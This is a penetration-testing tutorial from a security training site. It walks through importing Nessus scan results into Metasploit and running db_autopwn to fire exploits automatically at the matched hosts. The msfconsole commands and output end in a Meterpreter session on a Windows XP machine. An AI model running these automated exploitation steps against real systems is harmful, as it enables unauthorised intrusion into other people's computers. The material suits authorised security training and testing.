Metasploit Autopwn With Nessus Backtrack 5 Tutorial

Nessus is one of the best, most famous and user friendly vulnerability scanner that contain two feed one for the home user that is free while the other for professional (commercial). Metasploit, as you are related to the field of information security and penetration testing than you have must heard about it. Metasploit is a database of exploits. So the tutorial requires some background means some knowledge about Nessus and metasploit.

Nessus is just like OpenVAS but OpenVAS is open source, now from this point I consider that you have scanned a network with your Nessus if you dont know how than please read the basic tutorial about Nessus.
Now from the terminal open Metasploit 

[email protected]:# msfconsole

msf > db_create
[*] Creating a new database instance…
[*] Successfully connected to the database
[*] File: /root/.msf3/sqlite3.db
msf > load db_tracker
[*] Successfully loaded plugin: db_tracker
msf >

After creating the database you can do many things but it is recommended to check the help command.

msf > help


Database Backend Commands

    Command               Description
    ——-               ———–
    db_add_host           Add one or more hosts to the database
    db_add_note           Add a note to host
    db_add_port           Add a port to host
    db_autopwn            Automatically exploit everything
    db_connect            Connect to an existing database

Now the time is to import nessus result into metasploit windows, the command is below but be care while import provide the correct destination of your nessus result as i did.

msf > db_import_nessus_nbe /root/ehacking.nbe
msf > hosts
[*] Time: Tue Jun 14 17:40:23 -0600 2011 Host: Status: alive OS:

Now use “Vulns” command that will show the vulnerabilities that has been found by Nessus.

msf > vulns
[*] Time: Tue Jul 14 17:40:23 -0600 2009 Vuln: host= port=22 proto=tcp name=NSS- refs=NSS-
[*] Time: Tue Jul 14 17:40:23 -0600 2009 Vuln: host= port=445 proto=tcp name=NSS- refs=NSS-
[*] Time: Tue Jul 14 17:40:23 -0600 2009 Vuln: host= port=139 proto=tcp name=NSS- refs=NSS-
[*] Time: Tue Jul 14 17:40:23 -0600 2009 Vuln: host= port=137 proto=udp name=NSS- refs=NSS-,CVE-1999-0621
[*] Time: Tue Jul 14 17:40:23 -0600 2009 Vuln: host= port=445 proto=tcp name=NSS- refs=NSS-
[*] Time: Tue Jul 14 17:40:23 -0600 2009 Vuln: host= port=123 proto=udp name=NSS- refs=NSS-

db_autopwn is a command that read port,services and vulnerabilities that nessus result file contain and it will suggest the best exploits.

msf > db_autopwn -h
[*] Usage: db_autopwn [options]
-h Display this help text
-t Show all matching exploit modules
-x Select modules based on vulnerability references
-p Select modules based on open ports
-e Launch exploits against all matched targets
-r Use a reverse connect shell
-b Use a bind shell on a random port
-q Disable exploit module output
-I [range] Only exploit hosts inside this range
-X [range] Always exclude hosts inside this range
-PI [range] Only exploit hosts with these ports open
-PX [range] Always exclude hosts with these ports open
-m [regex] Only run modules whose name matches the regex

msf > db_autopwn -x -e
[*] (8/38): Launching exploit/multi/samba/nttrans against…
[*] (9/38): Launching exploit/windows/smb/psexec against…
[*] (10/38): Launching exploit/windows/smb/ms06_066_nwwks against…

[-] Exploit failed: The connection was refused by the remote host (
[*] (35/38): Launching exploit/windows/smb/ms03_049_netapi against…
[*] Started bind handler
[-] Exploit failed: No encoders encoded the buffer successfully.
msf >
[*] Binding to 3d742890-397c-11cf-9bf1-00805f88cb72:[email protected]_np:[alert] …
[*] Binding to 3919286a-b10c-11d0-9ba8-00c04fd92ef5:[email protected]_np:[lsarpc]…
[-] Exploit failed: The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] Exploit failed: The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[*] Transmitting intermediate stager for over-sized stage…(216 bytes)
[*] Sending stage (718336 bytes)
[*] Meterpreter session 1 opened ( ->

Autopwn has successfully exploit and we got the Meterpreter session, so by tis technique you can easily own a computer without sending any file by using nessus and metasploit.

msf > sessions -l

Active sessions

Id Description Tunnel
— ———– ——
1  Meterpreter ->

msf > sessions -i 1
[*] Starting interaction with 1…

meterpreter > sysinfo
Computer: DOOKIE-FA154354
OS : Windows XP (Build 2600, Service Pack 2).
meterpreter > getuid

Note: If you want to learn more about Linux and Windows based Penetration testing, you might want to subscribe our RSS feed and Email Subscription  or become our Facebook fan! You will get all the latest updates at both the places.
Ehacking Staff
With more than 50 global partners, we are proud to count the world’s leading cybersecurity training provider. EH Academy is the brainchild of Ehacking, which has been involved in the field of training since the past Five years and continues to help in creating professional IT experts.

Most Popular

What Makes ICS/OT Infrastructure Vulnerable?

Infrastructure security for operational technologies (OT) and industrial control systems (ICS) varies from IT security in several ways, with the inverse confidentiality, integrity, and...

Everything You Must Know About IT/OT Convergence

What is an Operational Technology (OT)? Operational technology (OT) is a technology that primarily monitors and controls physical operations. It can automate and control machines,...

Understand the OT Security and Its Importance

This article discusses OT security and why it is essential for protecting industrial systems from cyberattacks. We will also discuss common control objectives that can...

What is Deepfake, and how does it Affect Cybersecurity?

Producing deepfake is easy. It is hard to detect. They operate with a description of reality rather than reality itself (e.g., a video). Any...